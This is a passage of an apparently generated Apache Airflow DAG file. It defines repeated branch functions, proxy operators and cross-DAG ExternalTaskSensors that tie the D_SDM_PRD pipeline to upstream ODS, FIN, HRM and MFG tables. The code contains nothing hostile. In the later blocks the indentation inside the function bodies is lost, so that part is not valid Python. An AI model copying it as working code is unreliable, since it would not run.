execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG)
BRANCH_D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(D_SDM_PRDxD_STG_INIT__SYS_STS_STG)
D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG)
def branch_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_SDM_FIN")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT","D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT","D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"]
    return ["proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"]
my_taskid = "BRANCH_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"
BRANCH_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"
D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_FIN",
external_task_id="SDM_MANUFACTURING_PLANT",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT)
BRANCH_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT)
D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_ODS_PRD_SRC")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE","D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE","D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"]
    return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"
D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="Z_CDOCUMENT_CHECKING_RULE",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE)
D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_ODS_PRD_SRC")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"]
    return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="XXPLM_PROJECT",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT)
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_ODS_PRD_SRC")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS","D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS","D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"]
    return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"
D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="NSP_REQ_HEADERS",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS)
D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_ODS_PRD_SRC")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"]
    return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="EFLOW_PCS_HEADER_TW",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW)
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="EFLOW_PCS_LINEEE_TW",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW)
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="EFLOW_PCS_LINEER_TW",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW)
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="EFLOW_BTMS_EXPENSEPROJECT_TW",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW)
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW)
def branch_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_HRM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE","D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE","D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"]
return ["proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"
BRANCH_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"
proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"
D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_HRM",
external_task_id="UH_RDEXPENSE",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE.set_downstream(proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE)
BRANCH_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE.set_downstream(D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE)
D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE.set_downstream(proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE)
def branch_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_MFG_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP","D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP","D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"]
return ["proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"
BRANCH_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP = BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"
proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP = DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"
D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP = ExternalTaskSensor(
pool="sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_MFG_SRC",
external_task_id="XXWIP_STOREIN_USAGE_TEMP",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
